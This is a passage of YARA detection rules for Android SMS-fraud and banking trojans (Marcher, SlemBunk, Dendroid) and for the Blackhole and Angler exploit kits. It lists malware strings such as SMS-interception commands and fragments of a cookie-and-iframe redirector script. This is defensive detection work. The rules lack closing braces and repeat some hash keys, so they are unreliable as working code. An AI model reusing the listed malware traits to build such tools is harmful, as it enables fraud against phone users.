           $c = "__dso_handle"   
           $d = "lib/armeabi/libmylib.soUT"   
           $e = "]Diok\"3|"   
       condition:   
           all of them   
rule smsfraud1 : android   
   {   
       meta:   
           author = "Antonio Snchez https://twitter.com/plutec_net"   
           reference = "https://koodous.com/"   
           description = "This rule detects a kind of SMSFraud trojan"   
           sample = "265890c3765d9698091e347f5fcdcf1aba24c605613916820cc62011a5423df2"   
           sample2 = "112b61c778d014088b89ace5e561eb75631a35b21c64254e32d506379afc344c"   
      
       strings:   
           $a = "E!QQAZXS"   
           $b = "__exidx_end"   
           $c = "res/layout/notify_apkinstall.xmlPK"   
      
       condition:   
       all of them   
              
rule genericSMS2 : smsFraud android   
   {   
   	meta:   
   		author = "https://twitter.com/plutec_net"   
                   reference = "https://koodous.com/"   
   		sample = "1f23524e32c12c56be0c9a25c69ab7dc21501169c57f8d6a95c051397263cf9f"   
   		sample2 = "2cf073bd8de8aad6cc0d6ad5c98e1ba458bd0910b043a69a25aabdc2728ea2bd"   
   		sample3 = "20575a3e5e97bcfbf2c3c1d905d967e91a00d69758eb15588bdafacb4c854cba"   
      
   	strings:   
   		$a = "NotLeftTriangleEqual=022EC"   
   		$b = "SHA1-Digest: X27Zpw9c6eyXvEFuZfCL2LmumtI="   
   		$c = "_ZNSt12_Vector_baseISsSaISsEE13_M_deallocateEPSsj"   
   		$d = "FBTP2AHR3WKC6LEYON7D5GZXVISMJ4QU"   
      
   	condition:   
   		all of them   
   		   
rule genericSMS : smsFraud android   
   {   
   	meta:   
   	    	author = "https://twitter.com/plutec_net"   
               	reference = "https://koodous.com/"   
   	    	sample = "3fc533d832e22dc3bc161e5190edf242f70fbc4764267ca073de5a8e3ae23272"   
   	    	sample2 = "3d85bdd0faea9c985749c614a0676bb05f017f6bde3651f2b819c7ac40a02d5f"   
      
   	strings:   
   		$a = "SHA1-Digest: +RsrTx5SNjstrnt7pNaeQAzY4kc="   
   		$b = "SHA1-Digest: Rt2oRts0wWTjffGlETGfFix1dfE="   
   		$c = "http://image.baidu.com/wisebrowse/index?tag1=%E6%98%8E%E6%98%9F&tag2=%E5%A5%B3%E6%98%8E%E6%98%9F&tag3=%E5%85%A8%E9%83%A8&pn=0&rn=10&fmpage=index&pos=magic#/channel"   
   		$d = "pitchfork=022D4"   
      
   	condition:   
   		all of them   
   		   
// https://otx.alienvault.com/pulse/5977d9a90972116505362a3b
rule tachi : android   
   {   
   	meta:   
   		author = "https://twitter.com/plutec_net"   
   		source = "https://analyst.koodous.com/rulesets/1332"   
   		description = "This rule detects tachi apps (not all malware)"   
   		sample = "10acdf7db989c3acf36be814df4a95f00d370fe5b5fda142f9fd94acf46149ec"   
      
   	strings:   
   		$a = "svcdownload"   
   		$xml_1 = "<config>"   
   		$xml_2 = "<apptitle>"   
   		$xml_3 = "<txinicio>"   
   		$xml_4 = "<txiniciotitulo>"   
   		$xml_5 = "<txnored>"   
   		$xml_6 = "<txnoredtitulo>"   
   		$xml_7 = "<txnoredretry>"   
   		$xml_8 = "<txnoredsalir>"   
   		$xml_9 = "<laurl>"   
   		$xml_10 = "<txquieresalir>"   
   		$xml_11 = "<txquieresalirtitulo>"   
   		$xml_12 = "<txquieresalirsi>"   
   		$xml_13 = "<txquieresalirno>"   
   		$xml_14 = "<txfiltro>"   
   		$xml_15 = "<txfiltrourl>"   
   		$xml_16 = "<posicion>"   
      
      
   	condition:   
   		$a and 4 of ($xml_*)   
// https://otx.alienvault.com/pulse/5977d96b481b4c7935f5f812
rule SlemBunk : android   
   {   
   	meta:   
   		description = "Rule to detect trojans imitating banks of North America, Eurpope and Asia"   
   		author = "@plutec_net"   
   		sample = "e6ef34577a75fc0dc0a1f473304de1fc3a0d7d330bf58448db5f3108ed92741b"   
   		source = "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html"   
      
   	strings:   
   		$a = "#intercept_sms_start"   
   		$b = "#intercept_sms_stop"   
   		$c = "#block_numbers"   
   		$d = "#wipe_data"   
   		$e = "Visa Electron"   
      
   	condition:   
   		all of them   
   		   
      
// https://otx.alienvault.com/pulse/58ffc41da0117e544f052fe7
rule marcher2   
   {   
   	meta:   
   		author = "Antonio S. <asanchez@koodous.com>"   
   		source = "https://analyst.koodous.com/rulesets/890"   
   	strings:   
   		$a = "HDNRQ2gOlm"   
   		$b = "lElvyohc9Y1X+nzVUEjW8W3SbUA"   
   	condition:   
   		all of them   
   		   
rule marcher1   
   {   
   	meta:   
   		author = "Antonio S. <asanchez@koodous.com>"   
   		source = "https://analyst.koodous.com/rulesets/890"   
   		description = "This rule detects is to detect a type of banking malware"   
   		sample = "33b1a9e4a1591c1a39fdd5295874e365dbde9448098254a938525385498da070"   
      
   	strings:   
   		$a = "cmVudCYmJg=="   
   		$b = "dXNzZCYmJg=="   
      
   	condition:   
   		all of them   
   		   
rule marcher3   
   {   
   	meta:   
   		author = "Antonio S. <asanchez@koodous.com>"   
   		source = "https://analyst.koodous.com/rulesets/890"   
   		sample1 = "087710b944c09c3905a5a9c94337a75ad88706587c10c632b78fad52ec8dfcbe"   
   		sample2 = "fa7a9145b8fc32e3ac16fa4a4cf681b2fa5405fc154327f879eaf71dd42595c2"   
   	strings:   
   		$a = "certificado # 73828394"   
   		$b = "A compania TMN informa que o vosso sistema Android tem vulnerabilidade"   
   		   
   	condition:   
   		all of them   
rule marcher_v2   
   {   
   	meta:   
   		description = "This rule detects a new variant of Marcher"   
   		sample = "27c3b0aaa2be02b4ee2bfb5b26b2b90dbefa020b9accc360232e0288ac34767f"   
   		author = "Antonio S. <asanchez@koodous.com>"   
   		source = "https://analyst.koodous.com/rulesets/1301"   
   	strings:   
   		$a = /assets\/[a-z]{1,12}.datPK/   
   		$b = "mastercard_img"   
   		$c = "visa_verifed"   
      
   	condition:   
   		all of them   
      
// https://otx.alienvault.com/pulse/5977d7e1afb3db7e24c241b0
rule Dendroid : android   
   {   
   	meta:   
   	author = "https://twitter.com/jsmesa"   
   	reference = "https://koodous.com/"   
   	description = "Dendroid RAT"   
   	strings:   
       	$s1 = "/upload-pictures.php?"   
       	$s2 = "Opened Dialog:"   
       	$s3 = "com/connect/MyService"   
       	$s4 = "android/os/Binder"   
       	$s5 = "android/app/Service"   
      	condition:   
       	all of them   
      
rule Dendroid_3 : android   
   {   
   	meta:   
   	author = "https://twitter.com/jsmesa"   
   	reference = "https://koodous.com/"   
   	description = "Dendroid evidences via ServiceReceiver"   
   	strings:   
       	$1 = "ServiceReceiver"   
       	$2 = "Dendroid"   
      	condition:   
       	all of them   
      
rule Dendroid_2 : android   
   {   
   	meta:   
   	author = "https://twitter.com/jsmesa"   
   	reference = "https://koodous.com/"   
   	description = "Dendroid evidences via Droidian service"   
   	strings:   
       	$a = "Droidian"   
       	$b = "DroidianService"   
      	condition:   
       	all of them   
      
// https://otx.alienvault.com/pulse/564bb06667db8c7a156ba467
rule blackhole_basic :  EK   
   {   
       strings:   
           $a = /\.php\?\.*\?\:[a-zA-Z0-9\:]{6,}\&\.*\?\&/   
       condition:   
           $a   
rule blackhole2_htm : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-27"   
      description = "BlackHole2 Exploit Kit Detection"   
      hash0 = "92e21e491a90e24083449fd906515684"   
      hash1 = "98b302a504a7ad0e3515ab6b96d623f9"   
      hash2 = "a91d885ef4c4a0d16c88b956db9c6f43"   
      hash3 = "d8336f7ae9b3a4db69317aea105f49be"   
      hash4 = "eba5daf0442dff5b249274c99552177b"   
      hash5 = "02d8e6daef5a4723621c25cfb766a23d"   
      hash6 = "dadf69ce2124283a59107708ffa9c900"   
      hash7 = "467199178ac940ca311896c7d116954f"   
      hash8 = "17ab5b85f2e1f2b5da436555ea94f859"   
      sample_filetype = "js-html"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = ">links/</a></td><td align"   
      $string1 = ">684K</td><td>"   
      $string2 = "> 36K</td><td>"   
      $string3 = "move_logs.php"   
      $string4 = "files/"   
      $string5 = "cron_updatetor.php"   
      $string6 = ">12-Sep-2012 23:45  </td><td align"   
      $string7 = ">  - </td><td>"   
      $string8 = "cron_check.php"   
      $string9 = "-//W3C//DTD HTML 3.2 Final//EN"   
      $string10 = "bhadmin.php"   
      $string11 = ">21-Sep-2012 15:25  </td><td align"   
      $string12 = ">data/</a></td><td align"   
      $string13 = ">3.3K</td><td>"   
      $string14 = "cron_update.php"   
   condition:   
      14 of them   
rule blackhole2_htm12 : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-27"   
      description = "BlackHole2 Exploit Kit Detection"   
      hash0 = "0d3acb5285cfe071e30be051d2aaf28a"   
      hash1 = "6f27377115ba5fd59f007d2cb3f50b35"   
      hash2 = "f7ffe1fd1a57d337a04d3c777cddc065"   
      hash3 = "06997228f2769859ef5e4cd8a454d650"   
      hash4 = "11062eea9b7f2a2675c1e60047e8735c"   
      hash0 = "0d3acb5285cfe071e30be051d2aaf28a"   
      hash2 = "f7ffe1fd1a57d337a04d3c777cddc065"   
      hash7 = "4ec720cfafabd1c9b1034bb82d368a30"   
      hash8 = "ecd7d11dc9bb6ee842e2a2dce56edc6f"   
      sample_filetype = "js-html"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "  <title>Index of /data</title>"   
      $string1 = "<tr><th colspan"   
      $string2 = "</body></html>"   
      $string3 = "> 20K</td><td>"   
      $string4 = "/icons/layout.gif"   
      $string5 = " <body>"   
      $string6 = ">Name</a></th><th><a href"   
      $string7 = ">spn.jar</a></td><td align"   
      $string8 = ">spn2.jar</a></td><td align"   
      $string9 = " <head>"   
      $string10 = "-//W3C//DTD HTML 3.2 Final//EN"   
      $string11 = "> 10K</td><td>"   
      $string12 = ">7.9K</td><td>"   
      $string13 = ">Size</a></th><th><a href"   
      $string14 = "><hr></th></tr>"   
   condition:   
      14 of them   
rule blackhole2_htm8 : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-27"   
      description = "BlackHole2 Exploit Kit Detection"   
      hash0 = "3f47452c1e40f68160beff4bb2a3e5f4"   
      hash1 = "1e2ba0176787088e3580dfce0245bc16"   
      hash2 = "1c78d96bb8d8f8a71294bc1e6d374b0f"   
      hash3 = "f5e16a6cd2c2ac71289aaf1c087224ee"   
      hash2 = "1c78d96bb8d8f8a71294bc1e6d374b0f"   
      hash0 = "3f47452c1e40f68160beff4bb2a3e5f4"   
      hash2 = "1c78d96bb8d8f8a71294bc1e6d374b0f"   
      hash7 = "6702efdee17e0cd6c29349978961d9fa"   
      hash8 = "287dca9469c8f7f0cb6e5bdd9e2055cd"   
      sample_filetype = "js-html"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = ">Description</a></th></tr><tr><th colspan"   
      $string1 = ">Name</a></th><th><a href"   
      $string2 = "main.js"   
      $string3 = "datepicker.js"   
      $string4 = "form.js"   
      $string5 = "<address>Apache/2.2.15 (CentOS) Server at online-moo-viii.net Port 80</address>"   
      $string6 = "wysiwyg.js"   
   condition:   
      6 of them   
rule blackhole2_htm3 : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-27"   
      description = "BlackHole2 Exploit Kit Detection"   
      hash0 = "018ef031bc68484587eafeefa66c7082"   
      sample_filetype = "js-html"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "/download.php"   
      $string1 = "./files/fdc7aaf4a3 md5 is 3169969e91f5fe5446909bbab6e14d5d"   
      $string2 = "321e774d81b2c3ae"   
      $string3 = "/files/new00010/554-0002.exe md5 is 8a497cf4ffa8a173a7ac75f0de1f8d8b"   
      $string4 = "./files/3fa7bdd7dc md5 is 8a497cf4ffa8a173a7ac75f0de1f8d8b"   
      $string5 = "1603256636530120915 md5 is 425ebdfcf03045917d90878d264773d2"   
   condition:   
      3 of them   
rule blackhole2_pdf : EK PDF   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-27"   
      description = "BlackHole2 Exploit Kit Detection"   
      hash0 = "d1e2ff36a6c882b289d3b736d915a6cc"   
      sample_filetype = "pdf"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "/StructTreeRoot 5 0 R/Type/Catalog>>"   
      $string1 = "0000036095 00000 n"   
      $string2 = "http://www.xfa.org/schema/xfa-locale-set/2.1/"   
      $string3 = "subform[0].ImageField1[0])/Subtype/Widget/TU(Image Field)/Parent 22 0 R/F 4/P 8 0 R/T<FEFF0049006D00"   
      $string4 = "0000000026 65535 f"   
      $string5 = "0000029039 00000 n"   
      $string6 = "0000029693 00000 n"   
      $string7 = "%PDF-1.6"   
      $string8 = "27 0 obj<</Subtype/Type0/DescendantFonts 28 0 R/BaseFont/KLGNYZ"   
      $string9 = "0000034423 00000 n"   
      $string10 = "0000000010 65535 f"   
      $string11 = ">stream"   
      $string12 = "/Pages 2 0 R%/StructTreeRoot 5 0 R/Type/Catalog>>"   
      $string13 = "19 0 obj<</Subtype/Type1C/Length 23094/Filter/FlateDecode>>stream"   
      $string14 = "0000003653 00000 n"   
      $string15 = "0000000023 65535 f"   
      $string16 = "0000028250 00000 n"   
      $string17 = "iceRGB>>>>/XStep 9.0/Type/Pattern/TilingType 2/YStep 9.0/BBox[0 0 9 9]>>stream"   
      $string18 = "<</Root 1 0 R>>"   
   condition:   
      18 of them   
rule blackhole2_htm6 : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-27"   
      description = "BlackHole2 Exploit Kit Detection"   
      hash0 = "a5f94d7bdeb88b57be67132473e48286"   
      hash1 = "2e72a317d07aa1603f8d138787a2c582"   
      hash2 = "9440d49e1ed0794c90547758ef6023f7"   
      hash3 = "58265fc893ed5a001e3a7c925441298c"   
      hash2 = "9440d49e1ed0794c90547758ef6023f7"   
      hash0 = "a5f94d7bdeb88b57be67132473e48286"   
      hash2 = "9440d49e1ed0794c90547758ef6023f7"   
      hash7 = "95c6462d0f21181c5003e2a74c8d3529"   
      hash8 = "9236e7f96207253b4684f3497bcd2b3d"   
      sample_filetype = "js-html"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "uniq1.png"   
      $string1 = "edit.png"   
      $string2 = "left.gif"   
      $string3 = "infin.png"   
      $string4 = "outdent.gif"   
      $string5 = "exploit.gif"   
      $string6 = "sem_g.png"   
      $string7 = "Index of /library/templates/img"   
      $string8 = "uniq1.png"   
   condition:   
      8 of them   
rule blackhole2_htm5 : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-27"   
      description = "BlackHole2 Exploit Kit Detection"   
      hash0 = "fccb8f71663620a5a8b53dcfb396cfb5"   
      hash1 = "a09bcf1a1bdabe4e6e7e52e7f8898012"   
      hash2 = "40db66bf212dd953a169752ba9349c6a"   
      hash3 = "25a87e6da4baa57a9d6a2cdcb2d43249"   
      hash4 = "6f4c64a1293c03c9f881a4ef4e1491b3"   
      hash0 = "fccb8f71663620a5a8b53dcfb396cfb5"   
      hash2 = "40db66bf212dd953a169752ba9349c6a"   
      hash7 = "4bdfff8de0bb5ea2d623333a4a82c7f9"   
      hash8 = "b43b6a1897c2956c2a0c9407b74c4232"   
      sample_filetype = "js-html"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "ruleEdit.php"   
      $string1 = "domains.php"   
      $string2 = "menu.php"   
      $string3 = "browsers_stat.php"   
      $string4 = "Index of /library/templates"   
      $string5 = "/icons/unknown.gif"   
      $string6 = "browsers_bstat.php"   
      $string7 = "oses_stat.php"   
      $string8 = "exploits_bstat.php"   
      $string9 = "block_config.php"   
      $string10 = "threads_bstat.php"   
      $string11 = "browsers_bstat.php"   
      $string12 = "settings.php"   
   condition:   
      12 of them   
rule blackhole2_htm10 : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-27"   
      description = "BlackHole2 Exploit Kit Detection"   
      hash0 = "83704d531c9826727016fec285675eb1"   
      hash1 = "103ef0314607d28b3c54cd07e954cb25"   
      hash2 = "16c002dc45976caae259d7cabc95b2c3"   
      hash3 = "fd84d695ac3f2ebfb98d3255b3a4e1de"   
      hash4 = "c7b417a4d650c72efebc2c45eefbac2a"   
      hash5 = "c3c35e465e316a71abccca296ff6cd22"   
      hash2 = "16c002dc45976caae259d7cabc95b2c3"   
      hash7 = "10ce7956266bfd98fe310d7568bfc9d0"   
      hash8 = "60024caf40f4239d7e796916fb52dc8c"   
      sample_filetype = "js-html"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "</body></html>"   
      $string1 = "/icons/back.gif"   
      $string2 = ">373K</td><td>"   
      $string3 = "/icons/unknown.gif"   
      $string4 = ">Last modified</a></th><th><a href"   
      $string5 = "tmp.gz"   
      $string6 = ">tmp.gz</a></td><td align"   
      $string7 = "nbsp;</td><td align"   
      $string8 = "</table>"   
      $string9 = ">  - </td><td>"   
      $string10 = ">filefdc7aaf4a3</a></td><td align"   
      $string11 = ">19-Sep-2012 07:06  </td><td align"   
      $string12 = "><img src"   
      $string13 = "file3fa7bdd7dc"   
      $string14 = "  <title>Index of /files</title>"   
      $string15 = "0da49e042d"   
   condition:   
      15 of them   
rule blackhole2_htm4 : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-27"   
      description = "BlackHole2 Exploit Kit Detection"   
      hash0 = "926429bf5fe1fbd531eb100fc6e53524"   
      hash1 = "7b6cdc67077fc3ca75a54dea0833afe3"   
      hash2 = "82f108d4e6f997f8fc4cc02aad02629a"   
      hash3 = "bd819c3714dffb5d4988d2f19d571918"   
      hash4 = "9bc9f925f60bd8a7b632ae3a6147cb9e"   
      hash0 = "926429bf5fe1fbd531eb100fc6e53524"   
      hash2 = "82f108d4e6f997f8fc4cc02aad02629a"   
      hash7 = "386cb76d46b281778c8c54ac001d72dc"   
      hash8 = "0d95c666ea5d5c28fca5381bd54304b3"   
      sample_filetype = "js-html"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "words.dat"   
      $string1 = "/icons/back.gif"   
      $string2 = "data.dat"   
      $string3 = "files.php"   
      $string4 = "js.php"   
      $string5 = "template.php"   
      $string6 = "kcaptcha"   
      $string7 = "/icons/blank.gif"   
      $string8 = "java.dat"   
   condition:   
      8 of them   
rule blackhole2_jar : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-27"   
      description = "BlackHole2 Exploit Kit Detection"   
      hash0 = "86946ec2d2031f2b456e804cac4ade6d"   
      sample_filetype = "unknown"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "k0/3;N"   
      $string1 = "g:WlY0"   
      $string2 = "(ww6Ou"   
      $string3 = "SOUGX["   
      $string4 = "7X2ANb"   
      $string5 = "r8L<;zYH)"   
      $string6 = "fbeatbea/fbeatbee.classPK"   
      $string7 = "fbeatbea/fbeatbec.class"   
      $string8 = "fbeatbea/fbeatbef.class"   
      $string9 = "fbeatbea/fbeatbef.classPK"   
      $string10 = "fbeatbea/fbeatbea.class"   
      $string11 = "fbeatbea/fbeatbeb.classPK"   
      $string12 = "nOJh-2"   
      $string13 = "[af:Fr"   
   condition:   
      13 of them   
rule blackhole2_css : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-27"   
      description = "BlackHole2 Exploit Kit Detection"   
      hash0 = "9664a16c65782d56f02789e7d52359cd"   
      sample_filetype = "js-html"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string1 = "background:url('%%?a=img&img=countries.gif')"   
      $string2 = "background:url('%%?a=img&img=exploit.gif')"   
      $string3 = "background:url('%%?a=img&img=oses.gif')"   
      $string4 = "background:url('%%?a=img&img=browsers.gif')"   
      $string5 = "background:url('%%?a=img&img=edit.png')"   
      $string6 = "background:url('%%?a=img&img=add.png')"   
      $string7 = "background:url('%%?a=img&img=accept.png')"   
      $string8 = "background:url('%%?a=img&img=del.png')"   
      $string9 = "background:url('%%?a=img&img=stat.gif')"   
   condition:   
      18 of them   
rule blackhole2_htm11 : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-27"   
      description = "BlackHole2 Exploit Kit Detection"   
      hash0 = "e89b56df597688c489f06a0a6dd9efed"   
      hash1 = "06ba331ac5ae3cd1986c82cb1098029e"   
      hash2 = "a899dedb50ad81d9dbba660747828c7b"   
      hash3 = "7cbb58412554327fe8b643204a046e2b"   
      hash2 = "a899dedb50ad81d9dbba660747828c7b"   
      hash0 = "e89b56df597688c489f06a0a6dd9efed"   
      hash2 = "a899dedb50ad81d9dbba660747828c7b"   
      hash7 = "530d31a0c45b79c1ee0c5c678e242c02"   
      hash2 = "a899dedb50ad81d9dbba660747828c7b"   
      sample_filetype = "js-html"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "></th><th><a href"   
      $string1 = "/icons/back.gif"   
      $string2 = ">Description</a></th></tr><tr><th colspan"   
      $string3 = "nbsp;</td><td align"   
      $string4 = "nbsp;</td></tr>"   
      $string5 = ">  - </td><td>"   
      $string6 = "-//W3C//DTD HTML 3.2 Final//EN"   
      $string7 = "<h1>Index of /dummy</h1>"   
      $string8 = ">Size</a></th><th><a href"   
      $string9 = " </head>"   
      $string10 = "/icons/blank.gif"   
      $string11 = "><hr></th></tr>"   
   condition:   
      11 of them   
rule blackhole1_jar   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-26"   
      description = "BlackHole1 Exploit Kit Detection"   
      hash0 = "724acccdcf01cf2323aa095e6ce59cae"   
      sample_filetype = "unknown"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "Created-By: 1.6.0_18 (Sun Microsystems Inc.)"   
      $string1 = "workpack/decoder.classmQ]S"   
      $string2 = "workpack/decoder.classPK"   
      $string3 = "workpack/editor.classPK"   
      $string4 = "xmleditor/GUI.classmO"   
      $string5 = "xmleditor/GUI.classPK"   
      $string6 = "xmleditor/peers.classPK"   
      $string7 = "v(SiS]T"   
      $string8 = ",R3TiV"   
      $string9 = "META-INF/MANIFEST.MFPK"   
      $string10 = "xmleditor/PK"   
      $string11 = "Z[Og8o"   
      $string12 = "workpack/PK"   
   condition:   
      12 of them   
rule blackhole2_jar2 : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-27"   
      description = "BlackHole2 Exploit Kit Detection"   
      hash0 = "add1d01ba06d08818ff6880de2ee74e8"   
      sample_filetype = "unknown"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "6_O6d09"   
      $string1 = "juqirvs.classPK"   
      $string2 = "hw.classPK"   
      $string3 = "a.classPK"   
      $string4 = "w.classuS]w"   
      $string5 = "w.classPK"   
      $string6 = "YE}0vCZ"   
      $string7 = "v)Q,Ff"   
      $string8 = "%8H%t("   
      $string9 = "hw.class"   
      $string10 = "a.classmV"   
      $string11 = "2CniYFU"   
      $string12 = "juqirvs.class"   
   condition:   
      12 of them   
rule blackhole2_jar3 : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-27"   
      description = "BlackHole2 Exploit Kit Detection"   
      hash0 = "c7abd2142f121bd64e55f145d4b860fa"   
      sample_filetype = "unknown"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "69/sj]]o"   
      $string1 = "GJk5Nd"   
      $string2 = "vcs.classu"   
      $string3 = "T<EssB"   
      $string4 = "1vmQmQ"   
      $string5 = "Kf1Ewr"   
      $string6 = "c$WuuuKKu5"   
      $string7 = "m.classPK"   
      $string8 = "chcyih.classPK"   
      $string9 = "hw.class"   
      $string10 = "f';;;;{"   
      $string11 = "vcs.classPK"   
      $string12 = "Vbhf_6"   
   condition:   
      12 of them   
// https://otx.alienvault.com/pulse/56d5c4854637f2499b616afd
rule angler_flash : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-26"   
      description = "Angler Exploit Kit Detection"   
      hash0 = "8081397c30b53119716c374dd58fc653"   
      sample_filetype = "unknown"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "(9OOSp"   
      $string1 = "r$g@ 0'[A"   
      $string2 = ";R-1qTP"   
      $string3 = "xwBtR4"   
      $string4 = "YbVjxp"   
      $string5 = "ddgXkF"   
      $string6 = ")n'URF"   
      $string7 = "vAzq@W"   
      $string8 = "rOkX$6m<"   
      $string9 = "@@DB}q "   
      $string10 = "TiKV'iV"   
      $string11 = "538x;B"   
      $string12 = "9pEM{d"   
      $string13 = ".SIy/O"   
      $string14 = "ER<Gu,"   
   condition:   
      14 of them   
rule angler_flash5 : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-26"   
      description = "Angler Exploit Kit Detection"   
      hash0 = "9f809272e59ee9ecd71093035b31eec6"   
      sample_filetype = "unknown"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "0k%2{u"   
      $string1 = "\\Pb@(R"   
      $string2 = "ys)dVI"   
      $string3 = "tk4_y["   
      $string4 = "LM2Grx"   
      $string5 = "n}s5fb"   
      $string6 = "jT Nx<hKO"   
      $string7 = "5xL>>}"   
      $string8 = "S%,1{b"   
      $string9 = "C'3g7j"   
      $string10 = "}gfoh]"   
      $string11 = ",KFVQb"   
      $string12 = "LA;{Dx"   
   condition:   
      12 of them   
rule angler_flash4 : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-26"   
      description = "Angler Exploit Kit Detection"   
      hash0 = "dbb3f5e90c05602d92e5d6e12f8c1421"   
      sample_filetype = "unknown"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "_u;cwD;"   
      $string1 = "lhNp74"   
      $string2 = "Y0GQ%v"   
      $string3 = "qjqCb,nx"   
      $string4 = "vn{l{Wl"   
      $string5 = "5j5jz5"   
      $string6 = "a3EWwhM"   
      $string7 = "hVJb/4Aut"   
      $string8 = ",lm4v,"   
      $string9 = ",6MekS"   
      $string10 = "YM.mxzO"   
      $string11 = ";6 -$E"   
      $string12 = "QA%: fy"   
      $string13 = "<@{qvR"   
      $string14 = "b9'$'6l"   
      $string15 = ",x:pQ@-"   
      $string16 = "2Dyyr9"   
   condition:   
      16 of them   
rule AnglerEKredirector : EK   
   {   
      meta:   
         description = "Angler Exploit Kit Redirector"   
         ref = "http://blog.xanda.org/2015/08/28/yara-rule-for-angler-ek-redirector-js/"   
         author = "adnan.shukor@gmail.com"   
         date = "08-July-2015"   
         impact = "5"   
         version = "1"   
      strings:   
         $ekr1 = "<script>var date = new Date(new Date().getTime() + 60*60*24*7*1000);" fullword   
         $ekr2 = "document.cookie=\"PHP_SESSION_PHP="   
         $ekr3 = "path=/; expires=\"+date.toUTCString();</script>" fullword   
         $ekr4 = "<iframe src=" fullword   
         $ekr5 = "</iframe></div>" fullword   
      condition:   
         all of them   
rule angler_jar : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-26"   
      description = "Angler Exploit Kit Detection"   
      hash0 = "3de78737b728811af38ea780de5f5ed7"   
      sample_filetype = "unknown"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "myftysbrth"   
      $string1 = "classPK"   
      $string2 = "8aoadN"   
      $string3 = "j5/_<F"   
      $string4 = "FXPreloader.class"   
      $string5 = "V4w\\K,"   
      $string6 = "W\\Vr2a"   
      $string7 = "META-INF/MANIFEST.MF"   
      $string8 = "Na8$NS"   
      $string9 = "_YJjB'"   
   condition:   
      9 of them   
rule angler_flash2 : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-26"   
      description = "Angler Exploit Kit Detection"   
      hash0 = "23812c5a1d33c9ce61b0882f860d79d6"   
      sample_filetype = "unknown"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "4yOOUj"   
      $string1 = "CSvI4e"   
      $string2 = "'fwaEnkI"   
      $string3 = "'y4m%X"   
      $string4 = "eOc)a,"   
      $string5 = "'0{Q5<"   
      $string6 = "1BdX;P"   
      $string7 = "D _J)C"   
      $string8 = "-epZ.E"   
      $string9 = "QpRkP."   
      $string10 = "<o/]atel"   
      $string11 = "@B.,X<"   
      $string12 = "5r[c)U"   
      $string13 = "52R7F'"   
      $string14 = "NZ[FV'P"   
   condition:   
      14 of them   
rule angler_html : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-26"   
      description = "Angler Exploit Kit Detection"   
      hash0 = "afca949ab09c5583a2ea5b2006236666"   
      sample_filetype = "js-html"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = " A9 3E AF D5 9AQ FA 14 BC F2 A0H EA 7FfJ A58 A3 B1 BD 85 DB F3 B4 B6 FB B2 B4 14 82 19 88 28 D0 EA 2"   
      $string1 = " 2BS 25 26p 20 3F 81 0E D3 9C 84 C7 EC C3 C41M C48 D3 B5N 09 C2z 98 7B 09. DF 05 5EQ DF A3 B6 EE D5 "   
      $string2 = "9 A1Fg A8 837 9A A9 0A 1D 40b02 A5U6 22o 16 DC 5D F5 F5 FA BE FB EDX F0 87 DB C9 7B D6 AC F6D 10 1AJ"   
      $string3 = "24 AA 17 FB B0 96d DBN 05 EE F6 0F 24 D4 D0 C0 E4 96 03 A3 03 20/ 04 40 DB 8F 7FI A6 DC F5 09 0FWV 1"   
